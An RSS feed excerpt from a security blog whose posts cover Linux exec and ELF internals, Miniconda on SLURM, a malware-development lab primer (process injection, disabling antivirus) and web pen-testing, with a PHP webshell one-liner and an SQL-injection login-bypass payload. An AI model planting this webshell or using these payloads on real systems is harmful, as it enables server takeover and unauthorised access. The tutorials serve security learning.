<p><img src="https://rhinosecuritylabs.com/wp-content/uploads/2023/10/image5-1000x645.png" alt="Attacking AWS Cognito with Pacu (p2) - Rhino Security Labs" /></p>
]]></content:encoded></item><item><title><![CDATA[The Penguin & the ELF]]></title><description><![CDATA[Surfing the Linux kernel
Syscalling for execution
the exec system call has many types (as shown in the diagram) but here, we’ll be discussing a summarized overview of how these work. Basically we dealing with executing binaries or scripts through the...]]></description><link>https://blog.berzi.one/the-penguin-the-elf</link><guid isPermaLink="true">https://blog.berzi.one/the-penguin-the-elf</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Mon, 30 Dec 2024 16:03:43 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1767961927870/cedccf58-da26-43b8-b998-47c9fe09b685.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-surfing-the-linux-kernel">Surfing the Linux kernel</h2>
<h3 id="heading-syscalling-for-execution">Syscalling for execution</h3>
<p>The <code>exec</code> system call has many variants (as shown in the diagram), but here we’ll discuss a summarized overview of how they work. Basically, we’re dealing with executing binaries or scripts through the Linux kernel via <code>exec</code> and its sibling syscalls. But before we look at how such syscalls are defined in the Linux source code, we need to understand one thing: <strong>pointers</strong>.</p>
<p>pointers are variables that point to or store the memory address of another variable. Hence they “point to” the data of that variable.</p>
<p>Here’s an example of <code>execve</code> definition:</p>
<pre><code class="lang-c">
SYSCALL_DEFINE3(execve,
        <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> __user *, filename,
        <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> __user *<span class="hljs-keyword">const</span> __user *, argv,
        <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> __user *<span class="hljs-keyword">const</span> __user *, envp)
{
    <span class="hljs-keyword">return</span> do_execve(getname(filename), argv, envp);
}
</code></pre>
<p>This is a three-argument definition; the pointers mentioned earlier are crucial to understanding the arguments. <code>const char __user *const __user *</code> means we are defining a pointer in kernel space that points to a constant pointer defined in user space, which in turn points to characters in user space. <code>argv</code> is the array of arguments and, similarly, <code>envp</code> is the array of environment variables (like PATH).</p>
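<p>From userspace, the same syscall is easy to poke at. Here’s a quick sketch using Python’s <code>os</code> module on Linux; the <code>/bin/echo</code> path and the empty environment are assumptions for illustration:</p>

```python
import os

# Sketch: the userspace view of execve(2). The child's process image is
# replaced by /bin/echo, so code after os.execve never runs in the child.
r, w = os.pipe()
pid = os.fork()
if pid == 0:
    os.dup2(w, 1)   # point the child's stdout at the pipe
    os.close(r)
    os.execve("/bin/echo", ["/bin/echo", "hello from execve"], {})
    os._exit(127)   # only reached if execve itself failed
os.close(w)
os.waitpid(pid, 0)
output = os.read(r, 1024).decode()
print(output.strip())  # hello from execve
```

<p>The three arguments mirror the kernel definition above: the filename, the <code>argv</code> array, and the <code>envp</code> environment mapping.</p>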
<h3 id="heading-binary-format-handlers-and-linuxbinprm-struct">Binary format handlers and <code>linux_binprm</code> struct</h3>
<p>When we are loading the executable, a struct (a user-defined data structure that can store multiple basic data types) called <code>linux_binprm</code> is created to store the metadata about that executable, like argument and environment variable counts, the filename, and a buffer that stores the first 256 bytes of the file for identification of the binary format.</p>
<p>To identify the binary format, we have pointers known as binary format handlers, these are defined in files under the <code>fs</code> directory in the kernel source tree, and we iterate through these binfmt handlers to check which one matches the information in <code>linux_binprm</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1735569458066/ae1754ae-7c41-413f-82dd-47b89fda2ae0.png" alt class="image--center mx-auto" /></p>
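<p>The handler walk can be compressed into a toy sketch. The real handlers live in C under the kernel’s <code>fs/</code> directory (e.g. <code>fs/binfmt_elf.c</code> and <code>fs/binfmt_script.c</code>); this Python stand-in just shows the matching logic:</p>

```python
# Each "handler" inspects the buffered head of the file, like the load_binary()
# implementations in the kernel, and claims the file if its magic matches.
def elf_handler(buf: bytes):
    return "binfmt_elf" if buf[:4] == b"\x7fELF" else None

def script_handler(buf: bytes):
    return "binfmt_script" if buf[:2] == b"#!" else None

HANDLERS = [elf_handler, script_handler]

def match_binfmt(head: bytes):
    for handler in HANDLERS:  # mirrors the kernel walking its list of binfmts
        fmt = handler(head)
        if fmt:
            return fmt
    raise ValueError("no handler accepted this file (ENOEXEC)")

print(match_binfmt(b"\x7fELF\x02\x01\x01\x00"))  # prints binfmt_elf
print(match_binfmt(b"#!/bin/sh\n"))              # prints binfmt_script
```

<p>If no handler claims the buffer, the kernel gives up with <code>ENOEXEC</code>, which is what the exception stands in for here.</p>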
<h3 id="heading-kernel-modules">Kernel modules</h3>
<p>Kernel mods are extensible chunks of code that can add to an existing kernel’s features. We can add our own binfmt handlers through kernel modules.</p>
<p>Fancy things aside, here’s a diagram of the files and libraries in the Linux source tree that determine what does what when it comes to dealing with executables.</p>
<h2 id="heading-security-security-security">Security, Security, SECURITY!!!</h2>
<p>We have a few security checks in the entire process before and after loading the executable.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1735570290785/ec865b64-b513-4c6f-89ab-dc06593d5b49.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-httpsnvdnistgovvulndetailcve-2009-0029httpsnvdnistgovvulndetailcve-2009-0029"><a target="_blank" href="https://nvd.nist.gov/vuln/detail/CVE-2009-0029">CVE-2009-0029</a></h2>
<h2 id="heading-magical-elfs">Magical ELFs</h2>
<p><img src="https://blog.cloudflare.com/content/images/2021/03/segments-sections.png" alt="How to execute an object file: Part 1 | Noise" /></p>
<p>ELFs stand for Executable and Linkable formats, they are one of the most common executables in Linux.</p>
<p>Some parts:</p>
<ul>
<li><p>ELF Header: contains metadata about entry point, instruction-set, dynamic/static linking instructions, etc.</p>
</li>
<li><p>Program Header Table/Segments table: how to load and execute during runtime.</p>
</li>
<li><p>Section Header Table: contains info about the sections of the ELF for better debugging and organisation</p>
</li>
</ul>
<p>The program header table contains a series of entries with header types; here are the common ones:</p>
<ul>
<li><p>PT_LOAD: Data info to be loaded</p>
</li>
<li><p>PT_NOTE: Metadata (copyright, version)</p>
</li>
<li><p>PT_DYNAMIC: dynamic linking info</p>
</li>
<li><p>PT_INTERP: ELF interpreter path</p>
</li>
</ul>
<p>Let’s talk about the parts mentioned in the Section Header:</p>
<ol>
<li><p>.text: the <code>.text</code> section typically contains the <strong>executable code</strong> of the program. It is where the compiled instructions reside, and this section is loaded into memory during program execution.</p>
</li>
<li><p>.data: initialized global and static variables</p>
</li>
<li><p>.bss: uninitialized global and static variables (zero-filled at load time)</p>
</li>
<li><p>.rodata: read-only data, such as constants and string literals</p>
</li>
</ol>
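<p>The header layout described above can be poked at directly. Here’s a sketch that packs a minimal 64-bit ELF header with Python’s <code>struct</code> module and reads a few fields back; the offsets follow the ELF64 layout, and the entry-point value is arbitrary:</p>

```python
import struct

# ELF64 header starts with the 16-byte e_ident, then e_type, e_machine,
# e_version, and e_entry. Pack a minimal ET_EXEC header for x86-64.
header = struct.pack(
    "<4sBBBBB7xHHIQ",
    b"\x7fELF",  # magic number
    2,           # EI_CLASS: 64-bit
    1,           # EI_DATA: little-endian
    1,           # EI_VERSION
    0, 0,        # EI_OSABI, EI_ABIVERSION (7 padding bytes follow)
    2,           # e_type: ET_EXEC (executable file)
    0x3E,        # e_machine: x86-64
    1,           # e_version
    0x401000,    # e_entry: hypothetical entry point
)

# Read the fields back the way a loader would.
magic, ei_class, ei_data = header[:4], header[4], header[5]
e_type, e_machine, e_version, e_entry = struct.unpack_from("<HHIQ", header, 16)
print(hex(e_entry))  # prints 0x401000
```

<p>Running <code>readelf -h</code> on any binary shows the same fields decoded for you; this sketch is just the raw byte view of them.</p>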
<h3 id="heading-static-vs-dynamic-linking">Static Vs. Dynamic Linking</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1735570745713/e0b28295-ee9f-4ced-9dc6-d4b26627becf.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-dynamic-linking-and-dlls">Dynamic Linking and DLLs</h3>
<p>On Linux, libraries that are used for Dynamic Linking are saved as <code>.so</code> (shared object) files. Whereas on Windows, we call them <code>.dll</code> (dynamic link libraries)</p>
<p>When executing, the OS figures out which libraries are needed by going through the ELF header and the program header table. If the program is dynamically linked, another program called the “ELF interpreter” (the dynamic linker) gets involved. When loading, the kernel pushes the arguments and environment variables onto the process stack and sets a pointer to the start of the executable code; before the syscall returns, the kernel saves the current register values to the kernel stack and clears the registers. After the syscall, the kernel returns to user space, restores the register values, and jumps to the stored instruction pointer in userspace. NOW the ELF interpreter is executed and the current process image is replaced; the same cycle repeats for it as well.</p>
]]></content:encoded></item><item><title><![CDATA[🐍🌱 Setting Up Miniconda: Your Essential Guide to Conda on Linux 💻]]></title><description><![CDATA[🚀 Embark on Efficient Resource Management with SLURM!
Welcome, fellow developers and researchers, to the realm of efficient resource management powered by SLURM! 🌟 If you've ever found yourself lost amidst the labyrinth of job steps and Python envi...]]></description><link>https://blog.berzi.one/setting-up-miniconda-your-essential-guide-to-conda-on-linux</link><guid isPermaLink="true">https://blog.berzi.one/setting-up-miniconda-your-essential-guide-to-conda-on-linux</guid><category><![CDATA[#SLURM #HPC (High-Performance Computing) #ClusterManagement #JobScheduling #Miniconda #PythonEnvironments #MachineLearning #DataScience #ComputationalScience #ResearchTools]]></category><dc:creator><![CDATA[Yash Mehrotra]]></dc:creator><pubDate>Fri, 10 May 2024 06:39:26 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1715286115628/8035e669-9507-4d9f-b4ff-8daf04c96e5b.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-embark-on-efficient-resource-management-with-slurm">🚀 <strong>Embark on Efficient Resource Management with SLURM!</strong></h2>
<p>Welcome, fellow developers and researchers, to the realm of efficient resource management powered by SLURM! 🌟 If you've ever found yourself lost amidst the labyrinth of job steps and Python environment management, fret not! Today, I'm thrilled to be your guide as we demystify the process of setting up Miniconda on your SLURM cluster. 🐍🔧 With Miniconda at your disposal, you'll wield the ability to effortlessly create and manage tailored virtual environments, perfectly suited for your machine learning endeavors. Gone are the days of sweating over configuration complexities; let's streamline your workflow and unlock the true potential of your SLURM cluster.</p>
<p>Ready to embark on this journey? Let's dive in and empower your development experience like never before!</p>
<ul>
<li><p>Step 1: Download the Miniconda installation script using the command:</p>
<pre><code class="lang-bash">  curl -O https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh
</code></pre>
</li>
<li><p>Step 2: Make the script executable:</p>
<pre><code class="lang-bash">  chmod +x Miniconda3-latest-Linux-x86_64.sh
</code></pre>
</li>
<li><p>Step 3: Run the installation script and follow the prompts:</p>
<pre><code class="lang-bash">  ./Miniconda3-latest-Linux-x86_64.sh
</code></pre>
</li>
<li><p>Step 4: Add Miniconda to your PATH by updating your .bashrc file:</p>
<pre><code class="lang-bash">  <span class="hljs-built_in">echo</span> <span class="hljs-string">'export PATH="/path/to/miniconda3/bin:$PATH"'</span> &gt;&gt; ~/.bashrc
</code></pre>
<p>  The path will be specific to your system configuration. Replace <code>/path/to/miniconda3/bin</code> with the actual path to the Miniconda3 bin directory on your machine.</p>
</li>
<li><p>Step 5: Activate the changes:</p>
<pre><code class="lang-bash">  <span class="hljs-built_in">source</span> ~/.bashrc
</code></pre>
<p>  Now that Miniconda is up and running, let's initialize conda and get ready to supercharge our development workflow! 🎉</p>
</li>
<li><p>Step 6: Initialize conda for your shell:</p>
<pre><code class="lang-bash">  conda init
</code></pre>
<p>  <strong>After running this command, close the terminal and open a new one. You'll then be ready to use conda.</strong></p>
</li>
</ul>
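<p>To actually use an environment inside a SLURM job, a batch script can activate conda before running your code. Here's a minimal sketch; the partition name, environment name, and script path below are placeholders you must replace with values from your own cluster:</p>

```shell
#!/bin/bash
#SBATCH --job-name=train-model      # job name shown in squeue
#SBATCH --partition=gpu             # placeholder: pick a partition from your cluster
#SBATCH --time=01:00:00             # wall-clock limit

# make conda available in the non-interactive job shell
source ~/miniconda3/etc/profile.d/conda.sh
conda activate myenv                # placeholder environment name

python train.py                     # placeholder script
```

Submit it with <code>sbatch job.sh</code>; the <code>source</code> line matters because job shells are non-interactive and don't read your <code>.bashrc</code> hooks.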
<h2 id="heading-congratulations-youre-ready-to-roll">🎉 <strong>Congratulations! You're Ready to Roll</strong></h2>
<p>With Miniconda in place, you have the power to create tailored virtual environments for each of your machine learning projects. This flexibility ensures optimal performance and reproducibility in your workflows. Happy coding! 💻✨</p>
<h2 id="heading-additional-tips"><strong>Additional Tips :</strong></h2>
<ul>
<li><p><strong>Create Environments:</strong> Use <code>conda create --name myenv</code> to create a new environment.</p>
</li>
<li><p><strong>Activate Environment:</strong> Activate an environment with <code>conda activate myenv</code>.</p>
</li>
<li><p><strong>Install Packages:</strong> Install packages with <code>conda install package_name</code>.</p>
</li>
<li><p><strong>List Environments:</strong> List all environments with <code>conda env list</code>.</p>
</li>
</ul>
<p><strong>Explore the vast ecosystem of libraries and tools available through Miniconda to supercharge your development workflow.</strong></p>
]]></content:encoded></item><item><title><![CDATA[🔥Setting up Malware development Lab]]></title><description><![CDATA[Specifications and setup:
You need a pretty solid rig for development and testing across different platforms. Also, you will need heavyweight development tools (which will be mentioned later on). Anyways, here are some recommended specifications for ...]]></description><link>https://blog.berzi.one/setting-up-malware-development-lab</link><guid isPermaLink="true">https://blog.berzi.one/setting-up-malware-development-lab</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Mon, 22 Apr 2024 12:31:01 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1712671527377/edd6789d-1ab8-4aad-897a-db05808fa800.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-specifications-and-setup">Specifications and setup:</h2>
<p>You need a pretty solid rig for development and testing across different platforms. Also, you will need heavyweight development tools (which will be mentioned later on). Anyways, here are some recommended specifications for a system for malware development:</p>
<ul>
<li><p>At least 16 GB of DDR4/DDR5 RAM</p>
</li>
<li><p>At least a 6-core CPU with 10+ threads</p>
</li>
<li><p>A 512 GB or 1 TB SSD/HDD (SSD preferred)</p>
</li>
<li><p>Good cooling system</p>
</li>
</ul>
<p>Ideally, a gaming laptop or rig would help you achieve this, or you can simply use cloud VMs on Linode to prepare a lab.</p>
<p>Here are the tools that you may require for the lab:</p>
<ul>
<li><p>Visual Studio 20xx (community/professional)</p>
</li>
<li><p>Oracle Virtualbox/VMware workstation player</p>
</li>
<li><p>Kali Linux</p>
</li>
<li><p>Windows 10/11</p>
</li>
<li><p>Process Hacker</p>
</li>
<li><p>x64dbg</p>
</li>
</ul>
<h2 id="heading-fundamentals">Fundamentals</h2>
<p>First, you should know that <strong>malware is usually written for Windows-based</strong> systems, so we will focus on developing malware meant to <strong>work on Windows</strong>. For that, we need to know how to manipulate things like threads and processes on Windows. A great place to start is the <strong>Win32</strong> API, which lets you program Windows to perform tasks from both high- and low-level perspectives.</p>
<p>Also, make sure you are familiar with:</p>
<ul>
<li><p>Windows fundamentals (it also REALLY helps if you've used Windows before)</p>
</li>
<li><p>The C language and a bit of assembly</p>
</li>
<li><p>metasploit-framework</p>
</li>
<li><p>virtualization (because we are not detonating malware on our own computer)</p>
</li>
</ul>
<p>The best way to learn something is to try it out first, then go deeper into the theory. That being said, let's build malware... (Oh, and by the way, don't forget to turn off all AVs in your lab VM while building or running it.)</p>
<h3 id="heading-the-windows-api">The Windows API</h3>
<p>Understanding the Windows API is crucial, since a lot of malware is written against it. Malware also frequently calls the NT (native) API, the largely undocumented layer beneath Win32 exposed through <code>ntdll.dll</code>.</p>
<p>The type names follow Hungarian-style prefixes (P for pointer, H for handle, and so on), and function names are self-explanatory verb-noun pairs, with an A or W suffix for the ANSI or Unicode variant. You can notice the trend in the list given below.</p>
<p>Here's a list of stuff you need to remember:</p>
<pre><code class="lang-plaintext">DWORD = int32
SIZE_T = SIZEOF(object)
VOID = VOID
PVOID = Pointer to 32-bit variable
HANDLE = variable for object
HMODULE = handle for module 
PCSTR = constant character pointer
PSTR = chartacter pointer
PHANDLE = Handle pointer
CreateFileA = Create a file (ANSI)
CreateFileW = Create a file (Unicode)
</code></pre>
<h3 id="heading-process-injection-shellcode-based">Process Injection (Shellcode based)</h3>
<p>Shellcode is compiled machine code that, in the context of malware, is made to run on a target system through activities like injecting it into a running process.</p>
<p>We can write our own shellcode by compiling our C code. Or we can let tools like <code>msfvenom</code> do the job.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1713788226213/7f08d6c5-4f82-4742-b90d-f9ccd0cbebe4.png" alt class="image--center mx-auto" /></p>
<p>Here's how process injection works in layman's terms. We pick a process that's already running and grab its process ID (which uniquely identifies it). Using that ID we open a handle to the process, allocate a region of memory inside it, and write our shellcode into that region. Finally, we run the shellcode by starting a remote thread (think of a thread as a candle wick that burns once lit).</p>
<p>So, while the original process is running, our shellcode runs along with it in the background.</p>
<p>If you want to check out an example of shellcode injection, see my repo <a target="_blank" href="https://github.com/spirizeon/rootblast">RootBlast</a>.</p>
<h2 id="heading-problems-with-writing-malware">Problems with writing malware</h2>
<ul>
<li><p>It's difficult to find resources, mostly it'll be blogs and articles because mainstream platforms ban such content</p>
</li>
<li><p>You need to study a LOT of OS internals, especially Windows</p>
</li>
<li><p>You may get arrested (Ok, that's a joke, unless you're not careful)</p>
</li>
<li><p>AV/EDRs are constantly evolving so reading about how to make your malware undetectable is a must</p>
</li>
</ul>
<h2 id="heading-on-the-next-issue">On the next issue</h2>
<p>I'll talk about some more types of malware and also AV/EDR evasion techniques. Thank you for reading.</p>
<h2 id="heading-resources">Resources</h2>
<ul>
<li><p><a target="_blank" href="https://www.crow.rip/crows-nest/mal/dev/getting-started">https://www.crow.rip/crows-nest/mal/dev/getting-started</a></p>
</li>
<li><p><a target="_blank" href="https://github.com/r3p3r/nixawk-awesome-windows-exploitation">https://github.com/r3p3r/nixawk-awesome-windows-exploitation</a></p>
</li>
<li><p><a target="_blank" href="https://scholar.google.com/">https://scholar.google.com/</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[🕷️ Web Pen-testing strategies]]></title><description><![CDATA[In this blog, we will discuss most concepts concerning and related to web app security. Things like Auth-bypass, SSRF,etc. Massive thanks to portswigger for the inspiration.
WAPT in a nutshell
WAPT is nothing but looking for faults in the backend sys...]]></description><link>https://blog.berzi.one/zysec-recharged-month-1</link><guid isPermaLink="true">https://blog.berzi.one/zysec-recharged-month-1</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Fri, 29 Mar 2024 11:00:32 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1712345353782/bebaa827-df90-4d49-a68e-198c89f7027a.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In this blog, we will discuss most concepts concerning and related to web app security. Things like Auth-bypass, SSRF,etc. Massive thanks to portswigger for the inspiration.</p>
<h2 id="heading-wapt-in-a-nutshell">WAPT in a nutshell</h2>
<p>Web Application Penetration Testing (WAPT) is nothing but looking for faults in the backend of an application and then exploiting them. We use several tools for this, like fuzzers, proxies, and vulnerability scanners (I'll get into those later).</p>
<h2 id="heading-tools-for-wapt">Tools for WAPT</h2>
<h3 id="heading-fuzzers">Fuzzers</h3>
<p>Fuzzers are applications that can send the same request repetitively with minor edits. The edits are taken from an existing wordlist. Let's say we have a URL:</p>
<pre><code class="lang-plaintext">https://website.com/
</code></pre>
<p>Now we need to find the various API endpoints for this. So we will use a fuzzer to send requests with various edits to the website URL and hope for a success return code. (Here are the HTTP return codes for reference)</p>
<p><em>HTTP Return codes (Signals of API responses)</em></p>
<ul>
<li><p>2xx - Success</p>
</li>
<li><p>3xx - Redirection</p>
</li>
<li><p>4xx - Client side error</p>
</li>
<li><p>5xx - Server side error</p>
</li>
</ul>
<p>The fuzzer will use a wordlist that may look something like this:</p>
<pre><code class="lang-plaintext">v2
swagger
control-panel
...
</code></pre>
<p>Now the requests being sent will look like this:</p>
<pre><code class="lang-plaintext">GET https://website.com/api/v2 [RETURN CODE 403]
GET https://website.com/api/swagger [RETURN CODE 403]
#this one exists!
GET https://website.com/api/control-panel [RETURN CODE 200]

...
</code></pre>
<p>Common examples of fuzzers include ffuf, Burp Intruder, and GoBuster (which is specialised for directory enumeration).</p>
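<p>The loop a fuzzer runs can be sketched in a few lines of Python. This is a toy illustration, not a real HTTP client: the <code>known</code> table stands in for a live server's responses, and the paths and wordlist are made up for the example.</p>

```python
# toy fuzzer: try every wordlist entry as a path and keep the 200s
known = {"/api/control-panel": 200}      # stand-in for the real server's routes

def probe(path):
    # a real fuzzer would send an HTTP GET here and read the status code
    return known.get(path, 403)

wordlist = ["v2", "swagger", "control-panel"]
hits = [w for w in wordlist if probe(f"/api/{w}") == 200]
print(hits)  # endpoints that returned a success code
```

Real fuzzers add concurrency, rate limiting, and smarter response matching (length, regex), but the core loop is exactly this.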
<h3 id="heading-proxies">Proxies</h3>
<p>Proxies are tools that sit between the user's browser and the website. They capture the HTTP history of the communication between the two.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1711706001557/33b1b202-5f83-4045-91bc-0a1170333cce.png" alt class="image--center mx-auto" /></p>
<p>A common example of the proxy tool is Burp-Suite, the gold standard for WAPT.</p>
<h3 id="heading-vulnerability-scanners">Vulnerability scanners</h3>
<p>These tools assess the website for possible vulnerabilities and can generate things like phishing websites or SQL syntax to exploit it. Common tools are Metasploit (gold standard), XSRFProbe (For CSRF-based exploits), SQLMap (For SQLi based exploits)</p>
<h2 id="heading-dealing-with-internal-apis">Dealing with internal APIs</h2>
<p>Internal APIs deal with requests and responses sent between the website and the web-server.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1711708656523/5a9194a2-13d0-4dcc-82c9-bb0e099048d0.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-api-recon">API Recon</h2>
<p>The aim is to find as many endpoints as possible. This is an intermediate stage before exploitation. There are various types of HTTP requests; here's a list of common ones:</p>
<ul>
<li><p>GET -&gt; Ask the webserver for a resource</p>
</li>
<li><p>POST -&gt; Add new data</p>
</li>
<li><p>PATCH/PUT -&gt; Change existing data</p>
</li>
<li><p>OPTIONS -&gt; Options for types of requests allowed</p>
</li>
</ul>
<p>Through sending requests, we can explore these from the responses:</p>
<ul>
<li><p>Parameters (Hidden ones too)</p>
</li>
<li><p>Type of content accepted</p>
</li>
<li><p>Type of request accepted</p>
</li>
</ul>
<h2 id="heading-types-of-vulnerabilities">Types of vulnerabilities</h2>
<h3 id="heading-file-upload-and-webshell-attacks">File upload and webshell attacks</h3>
<p>Sometimes the file upload feature of a website can be used to upload malicious scripts onto the web server and execute them.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1711706542616/a8b8bd53-73dd-4c9a-9b3e-45b475ab20b0.png" alt class="image--center mx-auto" /></p>
<p>This can be exploited if there is no <code>Content-Type</code> header restriction on the API request, meaning the website does not check if the uploaded file is an image (as intended) or a PHP script.</p>
<p>When we are dealing with uploads like this, the most common attacks are webshell attacks, in which shell commands are executed on the web server using languages like PHP.</p>
<p>Here's an example command:</p>
<pre><code class="lang-php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">echo</span> passthru($_GET[<span class="hljs-string">'cmd'</span>]); <span class="hljs-meta">?&gt;</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1711706601232/d48a6591-4461-4680-9440-d37919e3f7c1.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-continued-flawed-file-type-validation">Continued: Flawed file type validation</h3>
<p>To counter this, website creators do add the <code>Content-Type</code> header check. But what if the request can be edited before it is sent? We can capture the outgoing request in Burp and change the <code>Content-Type</code> of the uploaded script to an image type.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1711706826048/4e494cd1-28ac-406e-9e8b-65fe141d365b.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-server-side-request-forgery">Server Side Request Forgery</h2>
<p>Server-Side Request Forgery (SSRF) is a technique where the attacker manipulates a request so that the web server itself fetches a URL of the attacker's choosing, usually to reach internal resources and gain access to sensitive info.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1711707235111/2405042f-dc8e-4b95-b6dd-16efec24754c.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-2fa-bypass">2FA bypass</h2>
<p>This is usually a rare case, but sometimes the application considers the user logged in after the password step, before they ever enter their MFA code, so the second factor can simply be skipped.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1711707440601/61a2bb15-3778-4d79-9d5d-0d8d0dcffe06.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-privilege-escalation">Privilege escalation</h2>
<p>In this technique we check whether we can access other users' profiles through our own, and work our way into the admin dashboard. We can achieve this by editing the search query in the URL or editing the parameters in the requests.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1711708032214/a9d6e23a-34ba-4223-a5a8-7e542975cd2f.png" alt class="image--center mx-auto" /></p>
<p>We can also explore the source code (usually JS) to look for clues about API endpoints to the admin panel</p>
<p>like this:</p>
<pre><code class="lang-plaintext">https://website.com/login/home?admin=false
#now set this to true
https://website.com/login/home?admin=true
</code></pre>
<p>Sometimes we may also find these parameters (like <code>admin</code>) in the HTTP history when exploring through the responses.</p>
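<p>Flipping a client-controlled query parameter like this is easy to script with the Python standard library. The URL below is the made-up example from this post:</p>

```python
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse

url = "https://website.com/login/home?admin=false"
parts = urlparse(url)
query = parse_qs(parts.query)
query["admin"] = ["true"]               # flip the client-controlled flag
tampered = urlunparse(parts._replace(query=urlencode(query, doseq=True)))
print(tampered)
```

The lesson for defenders is the mirror image: authorization must be decided server-side from the session, never from a parameter the client can rewrite.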
<h2 id="heading-sql-injection">SQL injection</h2>
<p>Structured Query Language (SQL) is used to query and manipulate databases with ease. However, when a web server builds queries from raw user input, we can craft SQL fragments (typed into search boxes or login forms) that travel through the internal API and change the query the server runs, returning the result of our query instead of the intended one.</p>
<p>Here's an example, if we have a login page requiring username and password and the user account existence is checked by this command in the web-server:</p>
<pre><code class="lang-plaintext">SELECT * FROM USERS WHERE username="superman" AND password="m4sterh4xx0r";
</code></pre>
<p>Then if it exists, the website logs the user in. We can exploit it.</p>
<p>We can input an SQL statement in the strings and edit the query sent through the internal API</p>
<pre><code class="lang-plaintext">SELECT * FROM USERS WHERE username="superman"--" AND password="m4sterh4xx0r";
</code></pre>
<p>Here we have input <code>"--</code> into the username field: the <code>"</code> closes the string and <code>--</code> comments out the rest of the query, so the password check is simply ignored and lets us in.</p>
<p>However, for an SQLi to be successful, we need to be wary of which SQL technology the web server is using, its version, and which columns accept string input (and sometimes the table name). Usually websites tend to use MySQL, MariaDB, PostgreSQL, or Oracle Database.</p>
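<p>The comment trick can be reproduced end-to-end against an in-memory SQLite database. The table and credentials here are invented for the demo, and because this vulnerable query uses single-quoted strings, the injected input is <code>superman'--</code> rather than the double-quote variant shown above:</p>

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('superman', 'm4sterh4xx0r')")

def login(username, password):
    # vulnerable: user input concatenated straight into the query string
    query = (f"SELECT * FROM users WHERE username='{username}' "
             f"AND password='{password}'")
    return conn.execute(query).fetchone() is not None

print(login("superman", "wrong"))      # False: normal failed login
print(login("superman'--", "wrong"))   # True: -- comments out the password check
```

The fix is parameterized queries, e.g. <code>conn.execute("SELECT * FROM users WHERE username=? AND password=?", (u, p))</code>, which keeps input as data rather than SQL.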
<h2 id="heading-cross-site-request-forgery">Cross-site request forgery</h2>
<p>This technique abuses the user's existing login session to make the application perform actions, such as changing their credentials, that the user never intended.</p>
<p>The most common application of CSRF is related (but not entirely encompassing) to phishing.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1711709575953/4a9ffdfb-c6c5-4bea-a600-5d0bd96cab26.png" alt class="image--center mx-auto" /></p>
<p>A user's login session (the time span during which the website considers the user logged in) is identified by a session cookie, a token held by the browser. In a CSRF attack the hacker does not need to steal this cookie: they trick the logged-in user's browser into sending a forged request (for example via a link or a hidden form on a malicious page), and the browser automatically attaches the session cookie. The website then treats the request as coming from the user and will happily change their credentials.</p>
<p>There are thankfully, safeguards to this:</p>
<ul>
<li><p>Additional <code>csrf token</code> parameter whose value is randomly generated every session</p>
</li>
<li><p>Measures to make sure that the generated CSRF token is tied to only that particular user's session</p>
</li>
</ul>
<p>If either of these is absent, it becomes easy for the hacker to attempt a CSRF attack.</p>
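<p>The first safeguard is simple to sketch: generate an unpredictable token per session and compare it in constant time on every state-changing request. The function and variable names below are illustrative, not from any particular framework:</p>

```python
import hmac
import secrets

sessions = {}   # session_id -> csrf token (a real app stores this server-side)

def issue_token(session_id):
    token = secrets.token_hex(32)        # fresh, unguessable, per-session
    sessions[session_id] = token
    return token

def verify_token(session_id, submitted):
    expected = sessions.get(session_id, "")
    # constant-time comparison avoids leaking the token byte-by-byte via timing
    return hmac.compare_digest(expected, submitted)
```

Because the attacker's forged page cannot read the token tied to the victim's session, any request it forges fails the <code>verify_token</code> check.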
<h1 id="heading-references">References:</h1>
<ul>
<li><p><a target="_blank" href="https://github.com/JohnTroony/php-webshells">https://github.com/JohnTroony/php-webshells</a></p>
</li>
<li><p><a target="_blank" href="https://portswigger.net/web-security">https://portswigger.net/web-security</a></p>
</li>
<li><p><a target="_blank" href="https://portswigger.net/burp">https://portswigger.net/burp</a></p>
</li>
<li><p><a target="_blank" href="https://github.com/ffuf/ffuf">https://github.com/ffuf/ffuf</a></p>
</li>
<li><p><a target="_blank" href="https://www.metasploit.com/">https://www.metasploit.com/</a></p>
